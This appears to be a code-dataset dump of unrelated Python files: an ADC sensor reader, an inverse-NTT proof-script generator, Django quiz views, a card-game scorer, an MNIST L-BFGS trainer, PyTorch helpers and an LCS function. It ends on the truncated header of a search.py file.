index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
11,000 | 47f88573281b6f3658499f600a9ca12b6a277423 | """
ADDR => GND => I2C ADDRESS = 0x48
From datasheet ADS1115 returns values from -32768 to 32767
Gain set as 1 measures up to 4.096 V
32767 / 4.096V = 7999.75
Therefore, we must divide reading by 7999.75 for voltage result
attopilot V ratio = 1 : 4.13
attopilot
"""
# ADS1115 scaling: at gain 1 full scale is 4.096 V over a signed 16-bit
# range, so one LSB is 4.096/32767 volts.
CONVERT = (4.096 / 32767)
vRatio = 4.13   # AttoPilot voltage divider ratio (1 : 4.13)
ADDR = 0x48     # I2C address with the ADDR pin tied to GND
GAIN = 1        # ADS1115 programmable gain setting

import smbus
from time import sleep
import Adafruit_ADS1x15

# ADC driver object and a raw bus handle (I2C bus 1)
ADC = Adafruit_ADS1x15.ADS1115(address=ADDR, busnum=1)
bus = smbus.SMBus(1)

# Quick check for I2C connection. Fix: catch only OSError (the base of I2C
# IOErrors) instead of a bare `except`, which also swallowed
# KeyboardInterrupt/SystemExit.
try:
    bus.write_quick(ADDR)
except OSError:
    print("ERROR")

#Start continuous conversions on A0
#ADC.start_adc(0, gain=1)
if __name__ == '__main__':
    while True:
        try:
            # READ SINGLE VOLTAGE ON A0, scaled to volts then by the divider
            volt = (ADC.read_adc(0, GAIN) * CONVERT) * vRatio
        except IOError:
            volt = 0
        try:
            # READ SINGLE CURRENT ON A1 (raw sensor voltage in volts)
            amps = (ADC.read_adc(1, GAIN) * CONVERT)
        except IOError:
            amps = 0
        # NOTE(review): `amp` is derived from the voltage channel via a fixed
        # 219.2 factor while the A1 reading is printed separately — confirm
        # this is the intended current calculation.
        amp = volt / 219.2
        print("%.6f V\t" % volt, "%.6f\t" % amps, "%.6f A" % amp)
        sleep(0.1)
|
11,001 | cd6d3215c5b935d57d7af1e09ed3cadee6edbb99 | #################################
# Basics
#################################
# return an LSB-first bit-vector
def int_to_bits(i, width):
    """Return *i* as an LSB-first bit-vector of length `width`."""
    bits = []
    for _ in range(width):
        i, bit = divmod(i, 2)
        bits.append(bit)
    return bits
# reverse a list
def reverse(l):
    """Return a reversed copy of list *l*."""
    return list(reversed(l))
# convert an LSB-first bit-vector to an int
def bits_to_int(bv):
    """Convert an LSB-first bit-vector back to an integer."""
    total = 0
    for pos, bit in enumerate(bv):
        total += bit * (1 << pos)
    return total
def bits_reverse(i, width):
    """Bit-reverse *i* within a field of `width` bits (helpers inlined)."""
    result = 0
    for _ in range(width):
        result = (result << 1) | (i & 1)
        i >>= 1
    return result
def memory(base, step, offset, postfix=''):
    """Render a memory-operand label `L0x<hex addr><postfix>`."""
    addr = base + step * offset
    return "L0x%x%s" % (addr, postfix)
def argument(name, index):
    """Render an argument name with a zero-padded 3-digit index."""
    return "%s%03d" % (name, index)
#################################
#################################
# inverse NTT
#################################
# Modulus q and root of unity zeta (values match Kyber's NTT parameters);
# R = 2^16 is the 16-bit radix referenced by the eqmod conditions below.
q = 3329
R = 2**16
zeta = 17
# Precomputed inverse-NTT root constants, grouped by the layer/loop of the
# target code that consumes them (see the group comments).
inv_roots = [
    # 1 layer
    1701, 1807, 1460, 2371, 2338, 2333, 308, 108, 2851, 870,
    854, 1510, 2535, 1278, 1530, 1185, 1659, 1187, 3109, 874,
    1335, 2111, 136, 1215, 2945, 1465, 1285, 2007, 2719, 2726,
    2232, 2512, 75, 156, 3000, 2911, 2980, 872, 2685, 1590,
    2210, 602, 1846, 777, 147, 2170, 2551, 246, 1676, 1755,
    460, 291, 235, 3152, 2742, 2907, 3224, 1779, 2458, 1251,
    2486, 2774, 2899, 1103,
    # 1st loop of 2 & 3 & 4 layers
    1275, 2652, 1065, 2881, 1571, 205, 1861,
    # 2nd loop of 2 & 3 & 4 layers
    725, 1508, 2368, 398, 2918, 1542, 1474,
    # 3rd loop of 2 & 3 & 4 layers
    951, 247, 1421, 3222, 2721, 2597, 1202,
    # 4th loop of 2 & 3 & 4 layers
    2499, 271, 90, 853, 2312, 681, 2367,
    # 5th loop of 2 & 3 & 4 layers
    1860, 3203, 1162, 1618, 130, 1602, 3147,
    # 6th loop of 2 & 3 & 4 layers
    666, 320, 8, 2813, 1871, 829, 1752,
    # 7th loop of 2 & 3 & 4 layers
    1544, 282, 1838, 1293, 2946, 3065, 2707,
    # 8th loop of 2 & 3 & 4 layers
    2314, 552, 2677, 2106, 1325, 2756, 171,
    # 5 & 6 & 7 layers
    3127, 3042, 1907, 1836, 1517, 359, 1932,
    # 128^-1 * 2^32
    1441
]
# Base addresses of the coefficient array and the root table in the target
# binary; num_cuts counts proof cuts emitted so far.
coeff_base = 0x2001a530
root_base = 0x800e5d4
num_cuts = 0
def print_cut():
    """Emit the next numbered `cut (* n *)` marker and bump the counter."""
    global num_cuts
    print("cut (* %d *)" % num_cuts)
    num_cuts += 1
def get_cut_num():
    """Return the index of the most recently emitted cut (numbered from 0)."""
    return num_cuts - 1
def print_inputs():
    # Declare the 256 sint16 procedure parameters f000..f255, four per line,
    # with a trailing comma on every line except the last (i == 252).
    type = "sint16"
    for i in range(0, 256, 4):
        print(" {0} {1}, {0} {2}, {0} {3}, {0} {4}{5}".
              format(type, argument('f', i), argument('f', i + 1),
                     argument('f', i + 2), argument('f', i + 3),
                     "," if i < 252 else ""))
def print_pre_range_condition():
    # Precondition ranges: every input coefficient f_i lies in (-q, q) when
    # read as a signed 16-bit value.
    print(" (* range *)")
    print(" and [")
    for i in range(0, 256):
        print(" (-{1})@16 <=s {0}, {0} <s {1}@16{2}".
              format(argument('f', i), q, "," if i < 255 else ""))
    print(" ]")
def print_pre_condition():
    # Full precondition: trivial algebraic part conjoined with the input
    # coefficient ranges.
    print("{")
    print(" true")
    print(" &&")
    print_pre_range_condition()
    print("}\n")
def print_params():
    # Bind the modulus q as a named sint16 constant in the emitted script.
    print("(* === params === *)\n")
    print("mov q {0}@sint16;".format(q))
    print("")
def init_srcs(mem_base):
    # Move each input argument f_i into its coefficient memory slot
    # (2-byte stride), two moves per emitted line.
    print("(* src *)")
    for i in range(0, 256, 2):
        print("mov {0} {1}; mov {2} {3};".
              format(memory(mem_base, 2, i), argument('f', i),
                     memory(mem_base, 2, i + 1), argument('f', i + 1)))
    print("")
def init_roots(mem_base):
    # Initialize the root table in memory from the inv_roots constants,
    # two sint16 moves per emitted line.
    print("(* inv_roots *)")
    for i in range(0, len(inv_roots), 2):
        print("mov {0} {1:4d}@sint16; mov {2} {3:4d}@sint16;".
              format(memory(mem_base, 2, i), inv_roots[i],
                     memory(mem_base, 2, i + 1), inv_roots[i + 1]))
    print("")
def print_inp_polys(mem_base, step):
    # Declare ghost variables inp_poly_0..inp_poly_127, one per degree-1
    # input ring (2 coefficients each), via the equation
    # inp_poly_i * inp_poly_i = <polynomial read from memory>.
    print("(* inp_polys *)")
    num_rings = 128
    num_coeffs = 256 // num_rings
    for i in range(num_rings, 2 * num_rings):
        ring_base = num_coeffs * (i - num_rings)
        print("ghost inp_poly_{0}@bit :".format(i - num_rings))
        print(" inp_poly_{0} * inp_poly_{0} = ".format(i - num_rings))
        # print (" inp_poly_{0} = ".format(i-num_rings))
        for j in range(ring_base, ring_base + num_coeffs, 2):
            print(" {0} * (x**{1}) + {2} * (x**{3}){4}".
                  format(memory(mem_base, step, j), j - ring_base,
                         memory(mem_base, step, j + 1), j + 1 - ring_base,
                         " + " if j < ring_base + num_coeffs - 2 else ""))
        print(" && true;\n")
def print_imm_polys(mem_base, step):
    # Declare ghost variables imm_poly_0..imm_poly_7, one per 32-coefficient
    # intermediate ring (the driver calls this between the layer 2+3+4 and
    # 5+6+7 sections), via imm_poly_i * imm_poly_i = <memory polynomial>.
    print("(* imm_polys *)")
    num_rings = 8
    num_coeffs = 256 // num_rings
    for i in range(num_rings, 2 * num_rings):
        ring_base = num_coeffs * (i - num_rings)
        print("ghost imm_poly_{0}@bit :".format(i - num_rings))
        print(" imm_poly_{0} * imm_poly_{0} = ".format(i - num_rings))
        # print(" imm_poly_{0} = ".format(i-num_rings))
        for j in range(ring_base, ring_base + num_coeffs, 2):
            print(" {0} * (x**{1}) + {2} * (x**{3}){4}".
                  format(memory(mem_base, step, j), j - ring_base,
                         memory(mem_base, step, j + 1), j + 1 - ring_base,
                         " + " if j < ring_base + num_coeffs - 2 else ""))
        print(" && true;\n")
def print_inits():
    # Emit all initialization: source coefficients, root table, a
    # nondeterministic scratch register, and the input-polynomial ghosts.
    print("(* === inits === *)\n")
    init_srcs(coeff_base)
    init_roots(root_base)
    print("(* regs *)")
    print("nondet r0@uint32;")
    print("")
    print_inp_polys(coeff_base, 2)
def print_mid_algebraic_condition(stage, mem_base, step, factor,
                                  end='', mem_postfix=''):
    # After `stage` inverse-NTT layers, assert for every input ring i that
    # factor * inp_poly_i^2 is congruent to the polynomial built from the
    # current memory coefficients, modulo [q, x**2 - zeta^bitrev(i, 8)].
    # Coefficients are printed two per line via the end='' interleaving.
    inp_num_rings = 128
    inp_num_coeffs = 256 // inp_num_rings
    num_rings = 2 ** (7 - stage)
    num_coeffs = 256 // num_rings
    for i in range(inp_num_rings, 2 * inp_num_rings):
        modulo = (zeta ** bits_reverse(i, 8)) % q
        ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
        print(" (* inp_poly_{0} *)".format(i - inp_num_rings))
        print(" eqmod {1} * (inp_poly_{0} * inp_poly_{0})".
              # print (" eqmod {1} * (inp_poly_{0})".
              format(i - inp_num_rings, factor))
        print(" (")
        for j in range(ring_base, ring_base + num_coeffs):
            if (j - ring_base) % 2 == 0: print(" ", end='')
            print("{0} * (x**{1}){2}".
                  format(memory(mem_base, step, j, mem_postfix), j - ring_base,
                         " + " if j < ring_base + num_coeffs - 1 else ""),
                  end='')
            if (j - ring_base) % 2 == 1: print("")
        print(" )")
        print(" [{0}, x**{1} - {2}]{3}".
              format(q, inp_num_coeffs, modulo,
                     ',' if i < 2 * inp_num_rings - 1 else end))
def print_mid_algebraic_condition_slice(stage, mem_base, step, factor,
                                        num_slice, ith_slice,
                                        end='', mem_postfix=''):
    # Same condition as print_mid_algebraic_condition, restricted to the
    # ith_slice-th of num_slice equal slices of the 128 input rings, so the
    # driver can prove each slice in its own cut.
    inp_num_rings = 128
    inp_num_coeffs = 256 // inp_num_rings
    rings_per_slice = inp_num_rings // num_slice
    num_rings = 2 ** (7 - stage)
    num_coeffs = 256 // num_rings
    for i in range(inp_num_rings + ith_slice * rings_per_slice,
                   inp_num_rings + (ith_slice + 1) * rings_per_slice):
        modulo = (zeta ** bits_reverse(i, 8)) % q
        ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
        print(" (* inp_poly_{0} *)".format(i - inp_num_rings))
        print(" eqmod {1} * (inp_poly_{0} * inp_poly_{0})".
              # print (" eqmod {1} * (inp_poly_{0})".
              format(i - inp_num_rings, factor))
        print(" (")
        for j in range(ring_base, ring_base + num_coeffs):
            if (j - ring_base) % 2 == 0: print(" ", end='')
            print("{0} * (x**{1}){2}".
                  format(memory(mem_base, step, j, mem_postfix), j - ring_base,
                         " + " if j < ring_base + num_coeffs - 1 else ""),
                  end='')
            if (j - ring_base) % 2 == 1: print("")
        print(" )")
        print(" [{0}, x**{1} - {2}]{3}".
              format(q, inp_num_coeffs, modulo,
                     ',' if i < inp_num_rings + (ith_slice + 1)
                            * rings_per_slice - 1 else end))
def print_range_condition(mem_base, step, factor, end='', mem_postfix=''):
    # Range side-condition: each of the 256 memory coefficients lies within
    # factor * (-q, q) as a signed 16-bit value.
    for i in range(0, 256):
        print(" {0}@16 * (-{1})@16 <=s {2}, {2} <s {0}@16 * {1}@16{3}".
              format(factor, q,
                     memory(mem_base, step, i, mem_postfix),
                     "," if i < 255 else end))
def print_backward_algebraic_condition(stage, mem_base, step, factor,
                                       end='', mem_postfix=''):
    # For each of the 8 intermediate ghost polynomials, assert that
    # 2^16 * imm_poly_i^2 is congruent to factor * <memory polynomial>,
    # modulo [q, x**32 - zeta^bitrev(i, 8)].
    inp_num_rings = 8
    inp_num_coeffs = 256 // inp_num_rings
    num_rings = 2 ** (7 - stage)
    num_coeffs = 256 // num_rings
    for i in range(inp_num_rings, 2 * inp_num_rings):
        modulo = (zeta ** bits_reverse(i, 8)) % q
        ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
        print(" (* imm_poly_{0} *)".format(i - inp_num_rings))
        print(" eqmod (2**16) * (imm_poly_{0} * imm_poly_{0})".
              # print (" eqmod (2**16) * (imm_poly_{0})".
              format(i - inp_num_rings))
        print(" {0} * (".format(factor))
        for j in range(ring_base, ring_base + num_coeffs):
            if (j - ring_base) % 2 == 0: print(" ", end='')
            print("{0} * (x**{1}){2}".
                  format(memory(mem_base, step, j, mem_postfix), j - ring_base,
                         " + " if j < ring_base + num_coeffs - 1 else ""),
                  end='')
            if (j - ring_base) % 2 == 1: print("")
        print(" )")
        print(" [{0}, x**{1} - {2}]{3}".
              format(q, inp_num_coeffs, modulo,
                     ',' if i < 2 * inp_num_rings - 1 else end))
def print_backward_algebraic_condition_slice(stage, mem_base, step, factor,
                                             num_slice, ith_slice,
                                             end='', mem_postfix=''):
    # Same condition as print_backward_algebraic_condition, restricted to
    # the ith_slice-th of num_slice equal slices of the 8 intermediate
    # rings so each slice can be proven in its own cut.
    inp_num_rings = 8
    inp_num_coeffs = 256 // inp_num_rings
    rings_per_slice = inp_num_rings // num_slice
    num_rings = 2 ** (7 - stage)
    num_coeffs = 256 // num_rings
    for i in range(inp_num_rings + ith_slice * rings_per_slice,
                   inp_num_rings + (ith_slice + 1) * rings_per_slice):
        modulo = (zeta ** bits_reverse(i, 8)) % q
        ring_base = num_coeffs * ((i - inp_num_rings) // (2 ** stage))
        print(" (* imm_poly_{0} *)".format(i - inp_num_rings))
        print(" eqmod (2**16) * (imm_poly_{0} * imm_poly_{0})".
              # print (" eqmod (2**16) * (imm_poly_{0})".
              format(i - inp_num_rings))
        print(" {0} * (".format(factor))
        for j in range(ring_base, ring_base + num_coeffs):
            if (j - ring_base) % 2 == 0: print(" ", end='')
            print("{0} * (x**{1}){2}".
                  format(memory(mem_base, step, j, mem_postfix), j - ring_base,
                         " + " if j < ring_base + num_coeffs - 1 else ""),
                  end='')
            if (j - ring_base) % 2 == 1: print("")
        print(" )")
        print(" [{0}, x**{1} - {2}]{3}".
              format(q, inp_num_coeffs, modulo,
                     ',' if i < inp_num_rings + (ith_slice + 1) *
                            rings_per_slice - 1 else end))
# ---------------------------------------------------------------------------
# Driver: emit the complete proof script for the inverse NTT. Layers are
# proven with cuts; the layer-2+3+4 and 5+6+7 conditions are additionally
# re-proven in 8 independent slices so that the final post condition can be
# discharged slice-by-slice from the matching pairs of slice cuts.
# ---------------------------------------------------------------------------
print ("proc main (")
print (" sint16 x,")
print_inputs ()
print (") =\n")
print_pre_condition ()
print_params ()
print_inits ()
print ("(* === layer 1 === *)")
print_cut ()
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (1, coeff_base, 2, factor=2)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
print ("(* === layer 2+3+4 === *)")
print_cut ()
# Remember this cut: the slice proofs below cite it as their premise.
cut_234_all = get_cut_num()
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (4, coeff_base, 2, factor=16)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
### split the algebraic conditions into 8 slices
cut_234_slices = []
for i in range (0, 8) :
    print_cut ()
    print (" true && true;\n")
    print ("(* slice {0} *)".format(i))
    print_cut ()
    cut_234_slices.append (get_cut_num())
    print (" and [")
    print_mid_algebraic_condition_slice (4, coeff_base, 2, factor=16,
                                         num_slice=8, ith_slice=i)
    print (" ] prove with [cuts [{0}]]".format(cut_234_all))
    print (" &&")
    print (" true")
    print (";\n")
### be ready for next layer
print_cut ()
print (" true")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ] prove with [cuts [{0}]]".format(cut_234_all))
print (";\n")
# Bind the 8 intermediate ghost polynomials before the remaining layers.
print_imm_polys (coeff_base, 2)
print ("(* === layer 5+6+7 === *)")
print_cut ()
cut_567_all = get_cut_num()
print (" (* algebraic *)")
print (" and [")
print_backward_algebraic_condition (7, coeff_base, 2, factor=16)
print (" ]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ]")
print (";\n")
### split the algebraic conditions into 8 slices
cut_567_slices = []
for i in range (0, 8) :
    print_cut ()
    print (" true && true;\n")
    print ("(* slice {0} *)".format(i))
    print_cut ()
    cut_567_slices.append (get_cut_num())
    print (" and [")
    print_backward_algebraic_condition_slice (7, coeff_base, 2, factor=16,
                                              num_slice=8, ith_slice=i)
    print (" ] prove with [cuts [{0}]]".format(cut_567_all))
    print (" &&")
    print (" true")
    print (";\n")
### prove the post condition separately in 8 cuts
print ("(* === prove post condition separately === *)")
cut_post_slices = [];
for i in range (0, 8) :
    print_cut ()
    print (" true && true;\n")
    print ("(* slice {0} *)".format(i))
    print_cut ()
    cut_post_slices.append (get_cut_num())
    print (" and [")
    print_mid_algebraic_condition_slice (7, coeff_base, 2, factor=(2**16),
                                         num_slice=8, ith_slice=i)
    # Each post-condition slice follows from the matching 2+3+4 and 5+6+7
    # slice cuts plus all ghost definitions.
    print (" ] prove with [cuts [{0}, {1}], all ghosts]".
           format(cut_234_slices[i], cut_567_slices[i]))
    print (" &&")
    print (" true")
    print (";\n")
print_cut ()
print (" true && true;\n")
print ("(* === post condition === *)")
print ("{")
print (" (* algebraic *)")
print (" and [")
print_mid_algebraic_condition (7, coeff_base, 2, factor=(2**16))
print (" ] prove with [cuts [", end='')
for i in range(0, 8) :
    print ("{0}{1}".format(cut_post_slices[i], ',' if i < 7 else ''), end='')
print ("]]")
print (" &&")
print (" (* range *)")
print (" and [")
print_range_condition (coeff_base, 2, factor=1)
print (" ] prove with [cuts [{0}]]".format(cut_567_all))
print ("}\n")
|
11,002 | 09c497b5000cde554dadecd5c9df43574711d92d | from django.urls import path
from . import views
# URL configuration for the campus app; app_name enables namespaced
# reversing ('campus:index', 'campus:learning', 'campus:lesson').
app_name = 'campus'
urlpatterns = [
    # Landing page.
    path('', views.index, name='index'),
    # A learning is addressed by its code; a lesson adds the unit slug.
    path('learn/<learning_code>', views.learning_view, name='learning'),
    path('learn/<learning_code>/<unit_slug>', views.lesson_view, name='lesson'),
]
|
11,003 | 1dc8332b8320adcdf92b6825c508ad4a3aacf9f6 | from django.shortcuts import render
from random import randint
# Create your views here.
def home(request):
    """Render the landing page with an empty template context."""
    context = {}
    return render(request, 'home.html', context)
def add(request):
    """Quiz view for addition: grade a submitted answer, then pose a new one."""
    num_1 = randint(0, 10)
    num_2 = randint(0, 10)
    if request.method == "POST":
        answer = request.POST['answer']
        old_num_1 = request.POST['old_num_1']
        old_num_2 = request.POST['old_num_2']
        # Empty submission: re-render with a warning, skipping the grading.
        if not answer:
            return render(request, 'add.html', {
                'answer': answer,
                'my_answer': "Please provide an input to the field.",
                'num_1': num_1,
                'num_2': num_2,
                'color': 'danger',
            })
        correct_answer = int(old_num_1) + int(old_num_2)
        if int(answer) == correct_answer:
            my_answer = "Correct! " + old_num_1 + " + " + old_num_2 + " = " + answer
            color = "info"
        else:
            my_answer = ("Incorrect! " + old_num_1 + " + " + old_num_2 +
                         " is not " + answer + ". Correct answer is " +
                         str(correct_answer))
            color = "danger"
        return render(request, 'add.html', {
            'answer': answer,
            'my_answer': my_answer,
            'num_1': num_1,
            'num_2': num_2,
            'color': color,
        })
    # GET: just pose a fresh problem.
    return render(request, 'add.html', {
        'num_1': num_1,
        'num_2': num_2,
    })
def subtract(request):
    """Quiz view for subtraction: grade a submitted answer, then pose a new one."""
    num_1 = randint(0, 10)
    num_2 = randint(0, 10)
    if request.method == "POST":
        answer = request.POST['answer']
        old_num_1 = request.POST['old_num_1']
        old_num_2 = request.POST['old_num_2']
        # Empty submission: re-render with a warning, skipping the grading.
        if not answer:
            return render(request, 'subtract.html', {
                'answer': answer,
                'my_answer': "Please provide an input to the field.",
                'num_1': num_1,
                'num_2': num_2,
                'color': 'danger',
            })
        correct_answer = int(old_num_1) - int(old_num_2)
        if int(answer) == correct_answer:
            my_answer = "Correct! " + old_num_1 + " - " + old_num_2 + " = " + answer
            color = "info"
        else:
            my_answer = ("Incorrect! " + old_num_1 + " - " + old_num_2 +
                         " is not " + answer + ". Correct answer is " +
                         str(correct_answer))
            color = "danger"
        return render(request, 'subtract.html', {
            'answer': answer,
            'my_answer': my_answer,
            'num_1': num_1,
            'num_2': num_2,
            'color': color,
        })
    # GET: just pose a fresh problem.
    return render(request, 'subtract.html', {
        'num_1': num_1,
        'num_2': num_2,
    })
def multiply(request):
    """Quiz view for multiplication: grade a submitted answer, then pose a new one."""
    num_1 = randint(0, 10)
    num_2 = randint(0, 10)
    if request.method == "POST":
        answer = request.POST['answer']
        old_num_1 = request.POST['old_num_1']
        old_num_2 = request.POST['old_num_2']
        # Empty submission: re-render with a warning, skipping the grading.
        if not answer:
            return render(request, 'multiply.html', {
                'answer': answer,
                'my_answer': "Please provide an input to the field.",
                'num_1': num_1,
                'num_2': num_2,
                'color': 'danger',
            })
        correct_answer = int(old_num_1) * int(old_num_2)
        if int(answer) == correct_answer:
            my_answer = "Correct! " + old_num_1 + " x " + old_num_2 + " = " + answer
            color = "info"
        else:
            my_answer = ("Incorrect! " + old_num_1 + " x " + old_num_2 +
                         " is not " + answer + ". Correct answer is " +
                         str(correct_answer))
            color = "danger"
        return render(request, 'multiply.html', {
            'answer': answer,
            'my_answer': my_answer,
            'num_1': num_1,
            'num_2': num_2,
            'color': color,
        })
    # GET: just pose a fresh problem.
    return render(request, 'multiply.html', {
        'num_1': num_1,
        'num_2': num_2,
    })
def divide(request):
    # Quiz view for division; num_2 starts at 1 so the freshly posed
    # problem never divides by zero.
    num_1 = randint(0, 10)
    num_2 = randint(1, 10)
    if request.method == "POST":
        answer = request.POST['answer']
        old_num_1 = request.POST['old_num_1']
        old_num_2 = request.POST['old_num_2']
        # Error Handling if no input field
        if not answer:
            my_answer = "Please provide an input to the field."
            color = 'danger'
            return render(request, 'divide.html', {
                'answer': answer,
                'my_answer': my_answer,
                'num_1': num_1,
                'num_2': num_2,
                'color': color,
            })
        correct_answer = int(old_num_1) / int(old_num_2)
        # NOTE(review): true division produces repeating floats (e.g. 1/3),
        # so float(answer) == correct_answer is practically unsatisfiable
        # unless the user types the full float repr — consider rounding or
        # math.isclose here.
        if float(answer) == correct_answer:
            my_answer = "Correct! " + old_num_1 + " / " + old_num_2 + " = " + answer
            color = "info"
        else:
            my_answer = "Incorrect! " + old_num_1 + " / " + old_num_2 + " is not " + answer + ". Correct answer is " + str(
                correct_answer)
            color = "danger"
        return render(request, 'divide.html', {
            'answer': answer,
            'my_answer': my_answer,
            'num_1': num_1,
            'num_2': num_2,
            'color': color, })
    return render(request, 'divide.html', {
        'num_1': num_1,
        'num_2': num_2,
    })
|
11,004 | d61b8657cb6bc1439d20fd7543c668e90a6cdae0 | from itertools import combinations
import json
from yaniv_rl import utils
from yaniv_rl.game.card import YanivCard
suits = YanivCard.suits
ranks = YanivCard.ranks

# Enumerate every 5-card hand from a fresh deck and bucket each hand's
# string form by its Yaniv hand score (0..50).
deck = utils.init_deck()
scores = {value: [] for value in range(51)}
for hand in combinations(deck, 5):
    scores[utils.get_hand_score(hand)].append(utils.cards_to_str(hand))

# Dump the full score table for offline inspection.
with open("scores.json", "w") as f:
    json.dump(scores, f, indent=4)
11,005 | 15e5897bab6d96635b80f682cabb7894d80f35ff | import time
from sys import path
from os import getcwd
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
from mpi4py import MPI
# Make the sibling Logger package importable and open a CSV run log.
p = getcwd()[0:getcwd().rfind("/")]+"/Logger"
path.append(p)
import Logger
logfile = Logger.DataLogger("MNIST_LBFGS","Epoch,time,train_accuaracy,test_accuaracy,train_cost,test_cost")
# Make the sibling lbfgs package importable.
p = getcwd()[0:getcwd().rfind("/")]+"/lbfgs"
path.append(p)
from lbfgs_optimizer import lbfgs_optimizer
from Opserver import Opserver
# MPI topology: rank 0 drives the optimization below; the other ranks run
# an op server answering evaluation requests.
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
# Parameters
learning_rate = 0.001
training_epochs = 100
batch_size = 100
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # MNIST data input (img shape: 28*28)
n_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
# Create model
def multilayer_perceptron(x, weights, biases):
    """Two-hidden-layer ReLU MLP; returns unscaled logits (no softmax)."""
    hidden_1 = tf.nn.relu(tf.add(tf.matmul(x, weights['h1']), biases['b1']))
    hidden_2 = tf.nn.relu(tf.add(tf.matmul(hidden_1, weights['h2']), biases['b2']))
    # Output layer is linear; the loss applies the softmax itself.
    logits = tf.matmul(hidden_2, weights['out']) + biases['out']
    return logits
# Store layers weight & bias
# Store layers weight & bias (randomly initialized)
weights = {
    'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
    'b1': tf.Variable(tf.random_normal([n_hidden_1])),
    'b2': tf.Variable(tf.random_normal([n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_classes]))
}
# Construct model
pred = multilayer_perceptron(x, weights, biases)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))
# Initializing the variables
init = tf.initialize_all_variables()
correct_prediction = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# Launch the graph pinned to a single CPU thread (no GPU) — presumably to
# keep evaluations deterministic across MPI ranks; confirm against
# lbfgs_optimizer's assumptions.
config = tf.ConfigProto(device_count={"CPU": 1, "GPU": 0},
                        inter_op_parallelism_threads=1,
                        intra_op_parallelism_threads=1)
sess=tf.Session(config=config)
sess.run(init)
# Train on a tiny 30-image subset of MNIST.
tx,ty = mnist.train.images[0:30],mnist.train.labels[0:30]
train_size = len(tx)
bsize=train_size
if rank==0:
    # Rank 0: build the distributed L-BFGS driver and register the batches.
    trainer=lbfgs_optimizer(0.0001, cost,[],sess,1,comm,size,rank)
    for b in range(5):
        # NOTE(review): with bsize == train_size only b == 0 yields a
        # non-empty slice; iterations 1..4 register empty batches.
        data_x=tx[bsize*b:bsize*(b+1)]
        data_y=ty[bsize*b:bsize*(b+1)]
        trainer.update(data_x,data_y,x,y)
    start=time.time()
    for i in range(40):
        # One L-BFGS step, then log train/test accuracy and cost.
        c = trainer.minimize()
        train=sess.run(accuracy,{x:tx,y:ty})
        test= sess.run(accuracy,{x:mnist.test.images,y:mnist.test.labels})
        train_cost=c
        test_cost= sess.run(cost,{x:mnist.test.images,y:mnist.test.labels})
        #f=trainer.functionEval
        #g=trainer.gradientEval
        #i=trainer.innerEval
        #print i, f, g, train, test,train_cost,test_cost
        logfile.writeData((i,time.time()-start, train, test,train_cost,test_cost))
else:
    # Other ranks serve cost/gradient evaluation requests over MPI.
    opServer=Opserver(0.0001, cost,[],sess,comm,size,rank,0,x,y,keep_prob=0.0)
    opServer.run()
|
11,006 | e2290eeeceea4b5085a50148b1231e36fe03b59a | """
Given two sequences, find the length of longest subsequence present in both of them.
A subsequence is a sequence that appears in the same relative order, but not necessarily contiguous.
For example, “abc”, “abg”, “bdf”, “aeg”, ‘”acefg”, .. etc are subsequences of “abcdefg”. So a string of
length n has 2^n different possible subsequences.
"""
# Shared memo table: maps (A, B) string pairs to their LCS length.
memo = {}

def LCS(A, B):
    """Length of the longest common subsequence of strings A and B (memoized)."""
    key = (A, B)
    if key in memo:
        return memo[key]
    # Base case: an empty string shares nothing with anything.
    if not A or not B:
        return 0
    if A[-1] == B[-1]:
        # Matching last characters extend the LCS of both prefixes.
        memo[key] = LCS(A[:-1], B[:-1]) + 1
    else:
        # Otherwise drop the last character of one side, take the better.
        memo[key] = max(LCS(A, B[:-1]), LCS(A[:-1], B))
    return memo[key]
if __name__ == "__main__":
    # Minimal self-test: run two LCS cases under unittest when executed
    # directly (importing this module does not trigger the tests).
    import unittest
    class Test(unittest.TestCase):
        def test1(self):
            # Empty inputs share an empty subsequence.
            self.assertEqual(LCS("", ""), 0)
        def test2(self):
            # "ACEFG" (length 5) is a longest common subsequence.
            self.assertEqual(LCS("ABCDEFG", "ACTEFSG"), 5)
    unittest.main()
|
11,007 | be1e3de0a9a2b3d3059b0f6707cc4bbed4b2482c | import torch
import scipy.ndimage as nd
def get_device():
    """Return the torch device to use: cuda:0 when available, else cpu."""
    return torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def one_hot_embedding(labels, num_classes=10):
    """One-hot encode integer labels by indexing rows of an identity matrix."""
    identity = torch.eye(num_classes)
    return identity[labels]
def rotate_img(x, deg):
    """Rotate a flattened 28x28 image by `deg` degrees and re-flatten it."""
    image = x.reshape(28, 28)
    rotated = nd.rotate(image, deg, reshape=False)
    return rotated.ravel()
|
11,008 | fc671e9e25a7dc16fcb1eb15b25394d21361c8d5 | # search.py
# ---------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
